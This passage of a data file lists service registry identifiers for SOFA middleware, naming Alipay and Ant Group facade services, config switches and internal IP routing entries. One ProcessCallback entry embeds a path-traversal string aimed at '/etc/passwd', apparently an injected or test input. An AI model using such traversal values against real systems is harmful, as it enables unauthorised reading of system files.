FAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.trafficcardsp.common.service.facade.TaxiDriverOperatingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.CreativeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrcher.common.service.facade.inner.DiagnoseTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.secdatacontext.common.facade.api.DataAssetsMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zcbprod.common.service.facade.space.service.SceneConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaypointcust.biz.rpc.apoint.AliapyPointQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.manage.facade.api.VerifyLogManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insxhbprod.common.service.facade.CommonGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_audit_error_handler_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.146.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcbenefitcore.facade.service.LoadTestDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.inviteconfig.service.InviteSceneVersionRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.processCodeShutPid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxcore.common.service.facade.api.myfavor.FavorServiceConfigNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.rdsguard.drm.RdsSystemSwitchDrmResource.timeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","alphad@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sdaappdist.common.service.facade.device.DeviceRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityProjectRecipientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.GotoneConfigDrmResource.repayNotesOfGrantSuccess,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobile.mdevsupport.biz.health.service.RuntimeTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.familycore.facade.FamilyGrowthInviteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.195.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:mif_classification_data_sync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.partner.api.PartnerMasterIdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:autoMergeLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.aipSerialIdWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mwealthprod.common.service.facade.RegisterAgentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCCreditQueryPromotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.login.LoginAccountServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:asa-core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.biz.service.gateway.mgw.service.VcpVoucherQueryMgwService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.216.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.core.service.guardian.ComputeClusterCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tsm.common.service.facade.rpc.spi.TsmDataServiceFacade:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.InstLoanLogRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.assetflux.service.api.QueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.logrotator-app-hour-custom_hourdelimiter:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.135.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antinvoice.biz.manage.manager.RiskManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlaw.common.service.facade.api.SupGuidelineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataservice.common.service.facade.PaymentQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fporgassetprod.facade.api.DailyCutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.PrizeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.morderprod.common.service.facade.minisign.MiniSignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdEmployeeManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:jianjia_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.FundDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.InsBizFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:fascore.product.testProductx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:msgopprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.chaos.dig.facade.LinkFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zcbprod.common.service.facade.bubble.service.AssetBubbleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.140.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finaicontentcore.api.alive.NlpInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.TransportCertDrmConfigImpl.warnEmailListDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:hb_product_order_auto_renewed_import_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:adtask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.findecision.common.service.facade.ivr.IvrNotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.SlaConfigResource.batchAgentDispatchCountMachine,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-BestUseKoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifin.bankcard.service.facade.FirstPayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundWebsiteCustomerLoginFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:antsecurity_antfeatureflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharitySourceMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.shadowKeySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antpim.biz.service.facade.TagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbinventorycenter.common.service.facade.api.SalesQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.117.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbbocenter.common.service.facade.price.PriceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.activity.IndustryprodActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:odcalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.167.212.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pricemng.common.service.facade.api.price.PricemngMigratePriceRecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.reindeer.GoodsDeliveryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_GMODELCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.pointmng.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linku.common.service.facade.secret.OpaqueSecretFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_ICFMNG_BILL_PLATFORM_DAY_END_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.114.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ANTP_ARDD@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hainaprod.common.service.facade.api.mini.apply.OpTaskExpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zfundcheck.common.service.facade.IssueInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CertifyUnfreeStateResolverService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_os_partnerAlioneAjaxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.client.facade.MerchantCacheClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.task.MsgTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.instance.api.InstancetransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundWorkDayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.biz.clusterprovider.ClusterProviderPrivateAPI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.217.171#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bpaas.ecomerchant.facade.attachment.admin.AttachmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.OrchestrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.autoaccess.EbppInstVerifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcservcenter.client.RcClientInvoker:1.0:rceducenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:monalisabff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CHAINTEST#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MSERVICESINSPECT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_TESTT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imerchopmng.merchant.common.service.facade.api.CrmProcessOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.124.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lendpofprod.common.service.facade.loanapi.consume.LoanConsumeRecQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.ReconModeDrmResource.supplyClearingMaxRow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:gfcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mydds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antthoth.service.facade.RuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.UserBehaviorGraphFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.manage.StmtFileServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.admin.template.LifeMsgSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizops.facade.ServerlessTaskAutoStampFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imif.common.service.client.service.MerchantQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.decisionx.facade.DecisionService:1.0:ins_lab@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-icdpcore-batch#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secucommunity.common.service.facade.group.api.GroupConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.retry.task.execute.RetryOrderDRMResource.retryOderWaitDurationMinute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.event.common.service.facade.service.EventPropertyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.NodeOperationApi:1.0:dpoperationplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:vouchercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:excashier@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.bumng.bumngDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ipsponsorprod.core.service.repository.message.rzone.MessageInfoRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskdepict.common.facade.RdFeatureReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.lfc.NewsfeedShareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromotion.common.service.facade.api.campaign.CampaignConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcreditcore.common.service.facade.ZmCreditNflFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.seal.SealQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.merchant.common.service.facade.ShopEquipmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.speech.manager.reply.ReplyManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.openapi.sdk.explorer.AntCloudApiExplorer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.serverlessplan.ServerlessPlanPrepostFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilechat.common.service.facade.api.AutoReplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:troublehunter_appOpsSearchService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.zmSwitchStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insopenprod.common.service.facade.api.InsDxDataApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.157.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundtaskcenter.clear.common.service.facade.TaConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rassistcenter.common.service.facade.api.IntvIssueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.api.SecurityPolicyQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.bdsv2.facade.BdsPackageInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_settleInterestCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.core.publicservice.ServiceBeanConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.calculateDateGap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:zdataconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.shakecode.ShakeCodeRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpayprod.senior.common.service.facade.task.api.TaskExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.combine.VcpCombineTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashiercore.service.facade.spi.CashierCoreBizCallbackService:1.0:uniontrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.client.drm.TairToTbaseSwitch.tbaseRouteGrayMethodsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoscene.common.service.facade.api.trans.FinsAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.identity.BizIdentityParserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.anteduprod.common.service.facade.api.ApplyTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amldata.com.service.facade.api.UserFlagService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.panda.LuGetDataFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.kwlib:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdscsalipay.common.service.facade.scene.AgdsSceneConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.BenefitServiceProviderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsautct.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.frdspcore.common.service.facade.api.EventRecordDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zqualitywalleetoe.common.service.facade.api.TestCaseExecutorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.recharge.CzChannelManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.PromoActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcateringprod.common.service.facade.pos.api.PosDeviceOrderInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.statistics.StatisticsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zdataquery.common.service.facade.hbase.FinComposeDepositbackHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_CLEARING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.nationContinentMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finskyeye.common.service.facade.business.facade.BusinessInsightFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FundAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmTairVersionManager.cdsProductPoolGray,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingcore.common.service.facade.InsCertificateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.50.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paymentmng.service.facade.payacceptance.PaccValidatorManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.xts.bacs.api.BusinessActivityControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aistudio.facade.AiStudioArgoExecService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteduprod.common.service.facade.api.SceneTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.fpaMessageNumPerTable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.platform.PlatformAppManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlescenter.common.service.facade.api.AesSignTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.zpublish.biz.shared.utils.NodeParameters.selectStrategyIndex,version=3.0@DRM#@#DEF